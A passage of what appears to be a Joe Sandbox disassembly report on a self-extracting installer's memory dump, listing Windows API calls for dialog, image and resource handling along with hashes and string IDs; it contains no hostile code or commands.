                                                                                                                                                                        • Part of subcall function 004097CD: SetFocus.USER32(00000000,?,?,004089E2,000004B4,000004B3,00000000,000004B4,00000000,?,00000000), ref: 00409839
                                                                                                                                                                        • Part of subcall function 00405296: SetWindowTextW.USER32(?,?), ref: 004052F7
                                                                                                                                                                        • Part of subcall function 0040501D: GetClassNameA.USER32(?,?,00000040), ref: 0040502E
                                                                                                                                                                        • Part of subcall function 0040501D: lstrcmpiA.KERNEL32(?,STATIC), ref: 00405045
                                                                                                                                                                        • Part of subcall function 0040501D: GetWindowLongW.USER32(?,000000F0), ref: 00405056
                                                                                                                                                                        • Part of subcall function 0040501D: GetParent.USER32(?), ref: 0040508B
                                                                                                                                                                        • Part of subcall function 0040501D: LoadLibraryA.KERNEL32(riched20), ref: 004050A0
                                                                                                                                                                        • Part of subcall function 0040501D: GetMenu.USER32(?), ref: 004050B3
                                                                                                                                                                        • Part of subcall function 0040501D: SetThreadLocale.KERNEL32(00000419), ref: 004050C0
                                                                                                                                                                        • Part of subcall function 0040501D: CreateWindowExW.USER32(00000000,RichEdit20W,00426A18,50000804,?,?,?,?,00000000,00000000,00000000,00000000), ref: 004050F0
                                                                                                                                                                        • Part of subcall function 0040501D: DestroyWindow.USER32(?), ref: 004050FD
                                                                                                                                                                        • Part of subcall function 0040501D: SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00405114
                                                                                                                                                                        • Part of subcall function 0040501D: GetSysColor.USER32(0000000F), ref: 00405118
                                                                                                                                                                        • Part of subcall function 0040501D: SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00405126
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B2), ref: 004088F6
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B2), ref: 00408902
                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00408909
                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040891E
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B5), ref: 0040892B
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B5), ref: 0040893B
                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00408946
                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408955
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B2), ref: 0040896B
                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00408A50
                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00408A6D
                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00408A86
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00408AEA
                                                                                                                                                                      • LoadIconW.USER32(00000000), ref: 00408AF1
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B1), ref: 00408B10
                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00408B13
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemWindow$MessageSend$Long$Load$HandleModule$IconMetricsSystemText$ClassColorCreateDestroyFocusImageLengthLibraryLocaleMenuNameParentShowThreadlstrcmpi
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2214986222-0
                                                                                                                                                                      • Opcode ID: 1b81f388e6aa9fef903c47ddb1861d16581847fe7d8d96ff5f76bf7b0600e741
                                                                                                                                                                      • Instruction ID: 7d9e0c02cb57fd514231bc40f0a36d101d14c3bc27ea799fcb3019c5f10878e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 1b81f388e6aa9fef903c47ddb1861d16581847fe7d8d96ff5f76bf7b0600e741
                                                                                                                                                                      • Instruction Fuzzy Hash: 3881B471344300BBEB256F259D8AF3A3A55AB84710F55403FFA42BA2D2DEBCDC019A5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00427A24), ref: 00406182
                                                                                                                                                                        • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404227
                                                                                                                                                                        • Part of subcall function 004041E0: wsprintfW.USER32 ref: 00404238
                                                                                                                                                                        • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00404247
                                                                                                                                                                        • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404252
                                                                                                                                                                        • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,0000002D), ref: 0040427C
                                                                                                                                                                        • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404287
                                                                                                                                                                        • Part of subcall function 004041E0: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00404299
                                                                                                                                                                        • Part of subcall function 004041E0: SetLastError.KERNEL32(00401877), ref: 004042CD
                                                                                                                                                                        • Part of subcall function 004041E0: lstrlenA.KERNEL32(00426DC8), ref: 00404303
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EnvironmentVariablelstrcmpi$lstrlenwsprintf
                                                                                                                                                                      • String ID: lb$(c$@ub$CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$WarningTitle
                                                                                                                                                                      • API String ID: 2247831197-2560350608
                                                                                                                                                                      • Opcode ID: 558de74c1914829119befbb775e06c999ebdd00639881f94e960903548287ea1
                                                                                                                                                                      • Instruction ID: 9bc760864be3993021b54235d2abfb5d6207f7680534d3eb6e5285ff08bc6828
                                                                                                                                                                      • Opcode Fuzzy Hash: 558de74c1914829119befbb775e06c999ebdd00639881f94e960903548287ea1
                                                                                                                                                                      • Instruction Fuzzy Hash: C75161B1B00314AEE744BB76BDA3A3A329DDA85B58725153FF901A72D1EB7C9D00861C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowDC.USER32(00000000), ref: 004034B1
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 004034BF
                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004034D2
                                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00403505
                                                                                                                                                                      • MulDiv.KERNEL32(?,00000003,00000002), ref: 00403510
                                                                                                                                                                      • MulDiv.KERNEL32(?,00000003,00000002), ref: 0040351E
                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0040352D
                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00403537
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00403546
                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00403551
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0040355B
                                                                                                                                                                      • SetStretchBltMode.GDI32(?,00000004), ref: 00403564
                                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 00403586
                                                                                                                                                                      • GetCurrentObject.GDI32(?,00000007), ref: 0040358F
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004035A1
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004035A7
                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 004035B2
                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 004035B7
                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 004035BE
                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004035CA
                                                                                                                                                                      • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 004035D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3462224810-0
                                                                                                                                                                      • Opcode ID: ca3fbb43e67b001f0a7385c2217cd3c43436acb52314a7ec7c63ed711cf9885f
                                                                                                                                                                      • Instruction ID: ff38abddddbd13a4402d6620e9fbc44aeba16cf437474320bfcf34561d193007
                                                                                                                                                                      • Opcode Fuzzy Hash: ca3fbb43e67b001f0a7385c2217cd3c43436acb52314a7ec7c63ed711cf9885f
                                                                                                                                                                      • Instruction Fuzzy Hash: 61413A71A00218BFDB319FA1DC49EAF7F79FF087A1F510061FA05A61A0C6758A51EBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000040), ref: 0040502E
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,STATIC), ref: 00405045
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00405056
                                                                                                                                                                        • Part of subcall function 004047FA: GetWindowTextLengthW.USER32(?), ref: 0040480C
                                                                                                                                                                        • Part of subcall function 004047FA: GetWindowTextW.USER32(?,00000000,00000001), ref: 00404828
                                                                                                                                                                      • GetParent.USER32(?), ref: 0040508B
                                                                                                                                                                      • LoadLibraryA.KERNEL32(riched20), ref: 004050A0
                                                                                                                                                                        • Part of subcall function 0040407A: GetParent.USER32(?), ref: 00404081
                                                                                                                                                                        • Part of subcall function 0040407A: GetWindowRect.USER32(?,?), ref: 00404095
                                                                                                                                                                        • Part of subcall function 0040407A: ScreenToClient.USER32(00000000,?), ref: 0040409D
                                                                                                                                                                        • Part of subcall function 0040407A: ScreenToClient.USER32(00000000,?), ref: 004040A8
                                                                                                                                                                      • GetMenu.USER32(?), ref: 004050B3
                                                                                                                                                                      • SetThreadLocale.KERNEL32(00000419), ref: 004050C0
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,RichEdit20W,00426A18,50000804,?,?,?,?,00000000,00000000,00000000,00000000), ref: 004050F0
                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 004050FD
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00405114
                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00405118
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00405126
                                                                                                                                                                        • Part of subcall function 00405873: WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,?,?,00000000,00000000,?,?,?,?,00401E30,?,?), ref: 004058AA
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000461,?,?), ref: 00405151
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$MessageSend$ClientParentScreenText$ByteCharClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuMultiNameRectThreadWidelstrcmpi
                                                                                                                                                                      • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                                                                                                      • API String ID: 1365818316-2281146334
                                                                                                                                                                      • Opcode ID: e80f2b9e01adc9f06222ce941373085f9fa63e4b4c4edc6a518c2788bc257d85
                                                                                                                                                                      • Instruction ID: d0faeef2b71dc028168e5b540228b09c2688d41a1a06afb6a98926d44fb67058
                                                                                                                                                                      • Opcode Fuzzy Hash: e80f2b9e01adc9f06222ce941373085f9fa63e4b4c4edc6a518c2788bc257d85
                                                                                                                                                                      • Instruction Fuzzy Hash: C23193B1A00219BFDB20ABE5EC49EBF7B7CEB48714B51003AF605F6191D67899018A69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00409DFA: GetDlgItem.USER32(?,?), ref: 00409E09
                                                                                                                                                                        • Part of subcall function 00409DFA: ShowWindow.USER32(00000000,?,?,00408B2D,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409E21
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B8), ref: 00408C34
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408C44
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B4), ref: 00408C6E
                                                                                                                                                                        • Part of subcall function 00409AD9: SetWindowTextW.USER32(?,00000000), ref: 00409AE2
                                                                                                                                                                        • Part of subcall function 00409982: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004099BA
                                                                                                                                                                        • Part of subcall function 00409982: GetDlgItem.USER32(?,000004B8), ref: 004099D7
                                                                                                                                                                        • Part of subcall function 00409982: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004099E6
                                                                                                                                                                        • Part of subcall function 00409982: wsprintfW.USER32 ref: 00409A04
                                                                                                                                                                        • Part of subcall function 00409982: GetDlgItem.USER32(?,000004B5), ref: 00409A22
                                                                                                                                                                        • Part of subcall function 0040885E: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408881
                                                                                                                                                                        • Part of subcall function 0040885E: LoadIconW.USER32(00000000), ref: 00408888
                                                                                                                                                                        • Part of subcall function 0040885E: GetSystemMetrics.USER32(00000032), ref: 0040889A
                                                                                                                                                                        • Part of subcall function 0040885E: GetSystemMetrics.USER32(00000031), ref: 0040889F
                                                                                                                                                                        • Part of subcall function 0040885E: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004088A8
                                                                                                                                                                        • Part of subcall function 0040885E: LoadImageW.USER32(00000000), ref: 004088AF
                                                                                                                                                                        • Part of subcall function 0040885E: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004088CD
                                                                                                                                                                        • Part of subcall function 0040885E: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004088DA
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B2), ref: 004088F6
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B2), ref: 00408902
                                                                                                                                                                        • Part of subcall function 0040885E: GetWindowLongW.USER32(00000000,000000F0), ref: 00408909
                                                                                                                                                                        • Part of subcall function 0040885E: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040891E
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B5), ref: 0040892B
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B5), ref: 0040893B
                                                                                                                                                                        • Part of subcall function 0040885E: GetWindowLongW.USER32(00000000,000000F0), ref: 00408946
                                                                                                                                                                        • Part of subcall function 0040885E: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408955
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B2), ref: 0040896B
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408C97
                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00408C9C
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408CB0
                                                                                                                                                                      • SetWindowLongW.USER32(00000000), ref: 00408CB3
                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408CDA
                                                                                                                                                                      • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408CEC
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B4), ref: 00408CFA
                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00408CFD
                                                                                                                                                                      • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408D29
                                                                                                                                                                      • CoCreateInstance.OLE32(00428F0C,00000000,00000001,00427EC0,00000000), ref: 00408D55
                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00408D76
                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00408D79
                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00408D89
                                                                                                                                                                      • EnableWindow.USER32(00000000), ref: 00408D8C
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408DA4
                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00408DA7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Item$Window$Long$MessageSend$System$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTextTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3521167636-0
                                                                                                                                                                      • Opcode ID: ef67e71b5071b52f4ae61d411bf084106cff6a876782ffd59d42d159159e0de7
                                                                                                                                                                      • Instruction ID: 7d97faf7b58cfcac3b5524609e1e1f36ef4c8061182e242fc7b79367371e6bcb
                                                                                                                                                                      • Opcode Fuzzy Hash: ef67e71b5071b52f4ae61d411bf084106cff6a876782ffd59d42d159159e0de7
                                                                                                                                                                      • Instruction Fuzzy Hash: 924175B0740704AFEA206B21DE4AF1B7AADEF40B05F41853DF645A52E1CF799C41CA2C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000040), ref: 00405620
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,STATIC), ref: 00405637
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00405648
                                                                                                                                                                      • GetMenu.USER32(?), ref: 0040565B
                                                                                                                                                                        • Part of subcall function 00404C1A: GetModuleHandleW.KERNEL32(00000000), ref: 00404C25
                                                                                                                                                                        • Part of subcall function 00404C1A: FindResourceExA.KERNEL32(00000000,?,?), ref: 00404C42
                                                                                                                                                                        • Part of subcall function 00404C1A: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00404C56
                                                                                                                                                                        • Part of subcall function 00404C1A: SizeofResource.KERNEL32(00000000,00000000), ref: 00404C67
                                                                                                                                                                        • Part of subcall function 00404C1A: LoadResource.KERNEL32(00000000,00000000), ref: 00404C71
                                                                                                                                                                        • Part of subcall function 00404C1A: LockResource.KERNEL32(00000000), ref: 00404C7C
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00405688
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 004056A8
                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 004056B4
                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00428EEC,?), ref: 004056D9
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004056E9
                                                                                                                                                                        • Part of subcall function 004034A5: GetWindowDC.USER32(00000000), ref: 004034B1
                                                                                                                                                                        • Part of subcall function 004034A5: GetDeviceCaps.GDI32(00000000,00000058), ref: 004034BF
                                                                                                                                                                        • Part of subcall function 004034A5: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004034D2
                                                                                                                                                                        • Part of subcall function 004034A5: GetObjectW.GDI32(?,00000018,?), ref: 00403505
                                                                                                                                                                        • Part of subcall function 004034A5: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403510
                                                                                                                                                                        • Part of subcall function 004034A5: MulDiv.KERNEL32(?,00000003,00000002), ref: 0040351E
                                                                                                                                                                        • Part of subcall function 004034A5: CreateCompatibleDC.GDI32(00000000), ref: 0040352D
                                                                                                                                                                        • Part of subcall function 004034A5: CreateCompatibleDC.GDI32(?), ref: 00403537
                                                                                                                                                                        • Part of subcall function 004034A5: SelectObject.GDI32(00000000,?), ref: 00403546
                                                                                                                                                                        • Part of subcall function 004034A5: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00403551
                                                                                                                                                                        • Part of subcall function 004034A5: SelectObject.GDI32(?,00000000), ref: 0040355B
                                                                                                                                                                        • Part of subcall function 004034A5: SetStretchBltMode.GDI32(?,00000004), ref: 00403564
                                                                                                                                                                        • Part of subcall function 004034A5: StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 00403586
                                                                                                                                                                        • Part of subcall function 004034A5: GetCurrentObject.GDI32(?,00000007), ref: 0040358F
                                                                                                                                                                        • Part of subcall function 004034A5: SelectObject.GDI32(?,00000000), ref: 004035A1
                                                                                                                                                                        • Part of subcall function 004034A5: SelectObject.GDI32(?,00000000), ref: 004035A7
                                                                                                                                                                        • Part of subcall function 004034A5: DeleteDC.GDI32(?), ref: 004035B2
                                                                                                                                                                        • Part of subcall function 004034A5: DeleteDC.GDI32(?), ref: 004035B7
                                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0040571B
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 0040572D
                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,?), ref: 0040573D
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405752
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureSendSizeofStreamlstrcmpi
                                                                                                                                                                      • String ID: IMAGES$STATIC
                                                                                                                                                                      • API String ID: 3592854226-1168396491
                                                                                                                                                                      • Opcode ID: 96c7b4543e048fb8ddd8a8114a524030a8619a82d6ff9daaad7d3f031e5ea24d
                                                                                                                                                                      • Instruction ID: dbcc53e82a793a0f111e4280b36cbfa53c87f8fb100a063f5f801e66f8a94b15
                                                                                                                                                                      • Opcode Fuzzy Hash: 96c7b4543e048fb8ddd8a8114a524030a8619a82d6ff9daaad7d3f031e5ea24d
                                                                                                                                                                      • Instruction Fuzzy Hash: 37412971A00208FFDB11ABA0DC88EAF7BBCEF48315F514069F605A6190D7799E06DB29
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B3), ref: 0040911F
                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00409128
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B4), ref: 0040916B
                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00409174
                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004091FD
                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409203
                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00409209
                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00409214
                                                                                                                                                                      • GetParent.USER32(?), ref: 00409239
                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040924A
                                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 0040925B
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004092C1
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040934B
                                                                                                                                                                        • Part of subcall function 004098A5: GetDlgItem.USER32(?,00000020), ref: 004098C3
                                                                                                                                                                        • Part of subcall function 004098A5: SetWindowPos.USER32(00000000,?,004095FA,?,?,?,?,?,00000000,?,?,75C08FB0,?,?,?,00000020), ref: 004098CA
                                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00409262
                                                                                                                                                                        • Part of subcall function 00408528: GetDlgItem.USER32(?,?), ref: 00408534
                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 004093D8
                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 004093DF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 747815384-0
                                                                                                                                                                      • Opcode ID: fb60bdcc4212d691a135da902df9e72a618cfc71d996d7414fa3402ee0628db0
                                                                                                                                                                      • Instruction ID: a6880f0c0ec605681ecd630fcceec5972baa126ae705386a7e9dc06df6d7b694
